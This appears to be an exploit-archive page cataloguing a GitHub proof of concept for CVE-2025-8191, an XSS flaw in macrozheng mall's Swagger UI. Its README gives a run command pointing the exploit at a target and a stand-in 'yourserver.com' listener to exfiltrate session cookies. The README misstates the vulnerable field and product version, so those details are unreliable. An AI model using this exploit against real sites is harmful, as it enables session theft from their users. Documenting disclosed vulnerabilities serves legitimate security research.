Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-8191 PoC — macrozheng mall Swagger UI index.html cross site scripting

Source
https://github.com/byteReaper77/CVE-2025-8191
Associated Vulnerability
Title:macrozheng mall Swagger UI index.html cross site scripting (CVE-2025-8191)
Description:A vulnerability, which was classified as problematic, was found in macrozheng mall up to 1.0.3. Affected is an unknown function of the file /swagger-ui/index.html of the component Swagger UI. The manipulation of the argument configUrl leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor deleted the GitHub issue for this vulnerability without any explanation. Afterwards the vendor was contacted early about this disclosure via email but did not respond in any way.
Description
A repository containing a PoC exploit for CVE‑2025‑8191 in Swagger UI, leveraging XSS injection to exfiltrate session cookies.
Readme
# CVE-2025-8191 – Swagger UI XSS Injection

## Description : 
 
This repository contains a Proof‑of‑Concept (PoC) exploit for CVE‑2025‑8191, a vulnerability found in Swagger UI.

The vulnerability allows Cross‑Site Scripting (XSS) injection in the “description” field, leading to remote script execution under Swagger UI versions ≤ 1.0.3.

## References :
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-8191   
## Usage :

```
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 
```
Replace http://target.com with the target Swagger UI URL, and http://yourserver.com with your HTTP listener for exfiltration.

## Disclaimer :
This code is for educational and security‑research purposes only. Do NOT use it on systems for which you do not have explicit permission. The author is not responsible for any misuse.

## License :
MIT License
File Snapshot

 [4.0K]  /data/pocs/4b613c83c4f7aebb281601204d9334e00c9c0197
├── [ 16K]  exploit.c
├── [1.0K]  LICENSE
└── [ 946]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →